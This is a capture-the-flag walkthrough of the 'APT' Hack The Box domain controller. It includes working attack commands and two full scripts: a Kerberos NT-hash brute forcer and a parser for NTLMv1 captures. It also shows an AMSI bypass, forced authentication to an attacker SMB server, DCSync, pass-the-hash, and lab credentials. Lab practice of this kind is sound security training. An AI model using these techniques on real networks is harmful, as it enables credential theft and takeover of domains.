APT

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions behind them.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.213 -oN allPorts
-sS: use the TCP SYN scan option. This scan is relatively unobtrusive, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online and skip host discovery.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case allPorts.
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:
nmap -sC -sV -p80,135 10.10.10.213 -oN targeted
-sC: perform the scan using the default set of NSE scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case targeted.
The website on port 80 shows a hosting site named Gigantic Hosting. Nothing is interesting on the website.

Port 135 is the MSRPC endpoint mapper. The DCOM IOXIDResolver interface behind it answers an unauthenticated ServerAlive2 call with the host's network bindings, which usually include its IPv6 addresses, so we can use the IOXIDResolver tool to list them.
python IOXIDResolver.py -t 10.10.10.213
The machine has a few IPv6 addresses. Let's add the first one to /etc/hosts, mapping it to the name apt.
nano /etc/hosts
Now that we have the IPv6 address of the machine, we can repeat the nmap scan, this time over IPv6, since the firewall rules for IPv4 and IPv6 are not necessarily the same.
nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 apt
-sS: use the TCP SYN scan option. This scan is relatively unobtrusive, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-Pn: assume the host is online and skip host discovery.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case allPortsv6.
-6: scan over IPv6 (the apt name resolves to the IPv6 address we added to /etc/hosts).
Many more ports are exposed over IPv6 than over IPv4. Let's get their services and versions.
nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 apt
-sC: perform the scan using the default set of NSE scripts (-sCV is shorthand for -sC -sV).
-sV: enable version detection.
-oN: save the scan result into a file, in this case targetedv6.
-6: scan over IPv6.
This looks like a domain controller: Kerberos (88), LDAP and the Global Catalog (389, 636, 3268, 3269) and the Kerberos password change service (464) are all exposed, and the nmap scripts report the domain name htb.local. Let's add it to the /etc/hosts file as well.
nano /etc/hosts
Let's enumerate the SMB shares of the DC.
smbclient -L apt -N
The backup share contains a single file called backup.zip. Let's connect to the share and download it (get backup.zip at the smbclient prompt).
smbclient //apt/backup -N
If we try to unzip it, we'll see it is protected with a password.
unzip backup.zip
Let's use zip2john and john to get the password.
zip2john backup.zip > hash
john -w=/usr/share/wordlists/rockyou.txt hash
Now unzip the file with the recovered password:
unzip backup.zip
The archive contains ntds.dit (the Active Directory database) and the SYSTEM registry hive, which holds the boot key needed to decrypt it. With these two files we can dump the NTDS hashes offline using secretsdump.
impacket-secretsdump -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile ntds_dump
There are a lot of users and hashes. Each line of the dump has the form user:rid:lmhash:nthash:::, so let's put the first field (the users) in the users file and the fourth field (the NT hashes) in the ntlm file.
awk -F: '{print $1}' ntds_dump.ntds > users
awk -F: '{print $4}' ntds_dump.ntds > ntlm
Exploitation
Now that we have a list of users, we need to find which of them actually exist in the domain. kerbrute does this by sending a Kerberos AS-REQ for each name: the KDC answers differently for existing and non-existing principals, so no password is needed.
kerbrute_linux_amd64 userenum --dc apt -d htb.local users
It found that henry.vinson is a valid user. As we have a valid user and a list of NTLM hashes, we could try to find his hash by trying each hash of the list against his account. The problem is that if we do it through SMB, the DC blocks us after a few attempts.
crackmapexec smb apt -u 'henry.vinson' -H ntlm
It seems that the DC blocks repeated failed logons over SMB, while nothing stopped the Kerberos traffic from kerbrute. So we need to brute force the NTLM hash through Kerberos instead. I made a small bash script, bruteforcer.sh, which tries to obtain a TGT for henry.vinson with each NTLM hash from the ntlm file: the NT hash is the RC4-HMAC Kerberos key, so getTGT from impacket can use it directly with -hashes, and the attempts can be spread over several threads to make it faster. Keep in mind that on a real domain a failed Kerberos pre-authentication still increments the account's badPwdCount, so check the lockout policy before doing this outside a lab.
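The following script is an added example of that approach; it is not the author's bruteforcer.sh, only a reconstruction of what the text describes. It assumes impacket-getTGT is on PATH (override with GETTGT=...), that the DC is reachable under the name apt configured above, and that the hash file is the ntlm file produced by the awk command.

```shell
#!/bin/sh
# Added example, not the writeup author's bruteforcer.sh. For a known-valid
# user, ask the KDC for a TGT with every candidate NT hash from the secretsdump
# output: the NT hash is the RC4-HMAC Kerberos key, so impacket-getTGT can use
# it directly via -hashes. Assumes impacket-getTGT is on PATH (override with
# GETTGT=...) and that "apt" resolves to the DC as set up in /etc/hosts above.
# Failed pre-auth still raises badPwdCount on a real domain, so check the
# lockout policy before running this outside a lab.
#
# Usage: sh bruteforcer.sh USER HASHFILE [THREADS]

DOMAIN="${DOMAIN:-htb.local}"
DC="${DC:-apt}"
GETTGT="${GETTGT:-impacket-getTGT}"

# dedupe_hashes FILE: keep only unique, lowercase, 32-hex NT hashes; blank
# lines and anything else that slipped into the file are dropped.
dedupe_hashes() {
    grep -Eio '^[0-9a-f]{32}$' "$1" | tr '[:upper:]' '[:lower:]' | sort -u
}

# try_hash USER HASH: one AS-REQ with pre-auth under this key. On success
# getTGT prints "Saving ticket in USER.ccache"; print the hash and return 0,
# otherwise return 1. Everything else getTGT says is discarded.
try_hash() {
    if "$GETTGT" -hashes ":$2" -dc-ip "$DC" "$DOMAIN/$1" 2>/dev/null \
            | grep -q 'Saving ticket'; then
        echo "$2"
        return 0
    fi
    return 1
}

# brute_tgt USER HASHFILE [THREADS]: try every candidate and stop at the first
# hit when sequential. With THREADS > 1 the script re-invokes itself through
# xargs with --try so attempts run in parallel (xargs then exits 123 because
# most attempts fail; the printed hash is the result).
brute_tgt() {
    threads="${3:-1}"
    if [ "$threads" -gt 1 ]; then
        dedupe_hashes "$2" | xargs -P "$threads" -n 1 sh "$0" --try "$1"
    else
        dedupe_hashes "$2" | while IFS= read -r h; do
            if try_hash "$1" "$h"; then break; fi
        done
    fi
}

case "${1:-}" in
    --try) try_hash "$2" "$3" ;;     # worker invocation used by xargs
    ?*)    brute_tgt "$@" ;;         # USER HASHFILE [THREADS]
esac
```

Run it as `sh bruteforcer.sh henry.vinson ntlm 8`; the only line on stdout is the hash that produced a ticket, and the matching henry.vinson.ccache is left in the working directory by getTGT.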
Run the script to get the valid NTLM hash for henry.vinson.
bash bruteforcer.sh
Confirm that the hash is valid.
crackmapexec smb apt -u 'henry.vinson' -H e53d87d42adaa3ca32bdb34a876cbffb
Impacket includes reg.py, which queries the registry remotely through the Remote Registry service with valid credentials, under the HKCR, HKCU, HKLM, HKU or HKCC hives. Let's look at HKU, which holds the hives of the user profiles currently loaded on the DC.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU"
Inside HKU\Software there is a key named GiganticHostingManagementSystem.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software"
This key might hold something interesting, since it is named after the website we saw earlier.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software\\GiganticHostingManagementSystem"
Let's verify the found credentials.
crackmapexec smb apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
They are valid, and since port 5985 (WinRM) is open and this user seems to be a member of the Remote Management Users group, we can get a shell via WinRM and grab the user flag.
evil-winrm -i apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
Privilege Escalation
Let's upload the WinPEAS binary to the machine in order to find possible privilege escalation paths.
upload /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
If we try to run the binary, Windows Defender blocks it.
.\winPEASx64.exe
Fortunately, evil-winrm can work around this: Bypass-4MSI patches AMSI in the current PowerShell session, and Invoke-Binary loads a .NET assembly from our own disk into memory, so winPEAS (a C# program) runs without ever being written to the target's disk.
Bypass-4MSI
Invoke-Binary /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
It found that the domain controller's LmCompatibilityLevel still allows LM and NTLMv1 responses. This is a problem because an NTLMv1 response is just three DES encryptions of the server's 8-byte challenge under keys derived from the NT hash (the third key carries only 16 unknown bits), so with a known, fixed challenge the response can be inverted back to the NT hash itself; no password needs to be cracked. The plan is to run a fake SMB server with Responder, force the machine account to authenticate to it, and submit the captured NTLMv1 response to crack.sh. First, edit the Responder configuration so that the challenge is the fixed value 1122334455667788, which is the challenge crack.sh's NTLMv1 rainbow tables were built for (newer Responder versions default to a random challenge).
nano /etc/responder/Responder.conf
Then launch Responder, forcing the LM downgrade.
responder -I tun0 --lm
-I: network interface to use.
--lm: force the LM hashing downgrade, so the client sends a plain LM/NTLMv1 response instead of one using extended session security (which would mix a client nonce into the challenge and defeat the fixed-challenge tables).
Now we need to make the victim authenticate to our fake SMB server. Since Windows Defender is present, we can ask MpCmdRun.exe to scan a file on a UNC path pointing at our machine; the scan is performed by the Defender service, which runs as SYSTEM, so the outgoing SMB connection is authenticated with the domain controller's machine account (APT$).
cd "Program Files\Windows Defender"
.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.14\random
Responder logs the capture as a line of the form APT$::HTB:LMresponse:NTresponse:1122334455667788. Now go to crack.sh's GET CRACKING page and submit the NT response field, prefixed with NTHASH:, which is the format crack.sh uses for NTLMv1 against the fixed challenge.
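Selecting the right capture by hand is error-prone, so here is an added helper (not part of the original writeup) that turns Responder's NTLMv1 log lines into crack.sh tokens and rejects the captures the fixed-challenge tables cannot handle. It assumes Responder's documented line layout USER::DOMAIN:LMRESP:NTRESP:CHALLENGE and the NTHASH: submission prefix; the log file path is whatever your Responder install writes to and is not hard-coded.

```shell
#!/bin/sh
# Added example, not part of the original writeup: turn the NTLMv1 captures
# Responder logs into the tokens crack.sh's GET CRACKING page takes, and refuse
# the ones its fixed-challenge rainbow tables cannot use. Responder writes one
# capture per line as USER::DOMAIN:LMRESP:NTRESP:CHALLENGE (for example in its
# logs/SMB-NTLMv1-Client-<ip>.txt); the path depends on your install.

FIXED_CHALLENGE="1122334455667788"   # the challenge the crack.sh tables assume

# to_cracksh LINE: print "NTHASH:<48-hex NT response>" for a usable capture,
# otherwise explain on stderr and return 1. Rejected: lines that are not NTLMv1
# (NTLMv2 lines are longer and laid out differently), captures against any
# other challenge, and responses negotiated with extended session security:
# there the LM field is an 8-byte client nonce plus 16 zero bytes and the DES
# input is MD5(server_challenge || client_nonce)[0:8], not the logged challenge.
to_cracksh() {
    line="$1"
    user="${line%%::*}";   rest="${line#*::}"
    domain="${rest%%:*}";  rest="${rest#*:}"
    lmresp="${rest%%:*}";  rest="${rest#*:}"
    ntresp="${rest%%:*}";  challenge="${rest#*:}"
    lmresp=$(printf '%s' "$lmresp" | tr '[:upper:]' '[:lower:]')
    ntresp=$(printf '%s' "$ntresp" | tr '[:upper:]' '[:lower:]')
    who="$domain\\$user"

    if [ "${#ntresp}" -ne 48 ] || [ "${#lmresp}" -ne 48 ]; then
        printf 'skip %s: not an NTLMv1 capture\n' "$who" >&2; return 1
    fi
    case "$ntresp$lmresp" in
        *[!0-9a-f]*) printf 'skip %s: non-hex response\n' "$who" >&2; return 1 ;;
    esac
    if [ "$challenge" != "$FIXED_CHALLENGE" ]; then
        printf 'skip %s: challenge %s, tables need %s\n' "$who" "$challenge" "$FIXED_CHALLENGE" >&2
        return 1
    fi
    # ESS: client nonce (16 hex) followed by 32 hex zeros
    if [ "$(printf '%s' "$lmresp" | cut -c17-)" = "$(printf '%032d' 0)" ]; then
        printf 'skip %s: extended session security was negotiated\n' "$who" >&2; return 1
    fi
    echo "NTHASH:$ntresp"
}

# cracksh_from_log FILE: every usable capture in a Responder log, deduplicated,
# ready to paste into the submission form.
cracksh_from_log() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        to_cracksh "$line" || true
    done < "$1" | sort -u
}
```

A capture that is skipped because extended session security was negotiated means the --lm downgrade did not take effect for that client; the response is still crackable, but as a DES brute force against the derived challenge, not with the rainbow tables.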

Some time later you should receive an email with the NT hash of the domain controller's machine account, APT$.

A domain controller's machine account has directory replication rights, so with this hash we can DCSync the live NTDS of the domain controller with secretsdump (it uses DRSUAPI replication when given a remote target), without needing the backup this time.
impacket-secretsdump -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'
Now that we have the real NTLM hash of the Administrator user, we can pass the hash over WinRM to get a shell as him, and then all we have to do is reap the harvest and take the root flag.
evil-winrm -i apt -u 'administrator' -H c370bddf384a691d811ff3495e8a72e2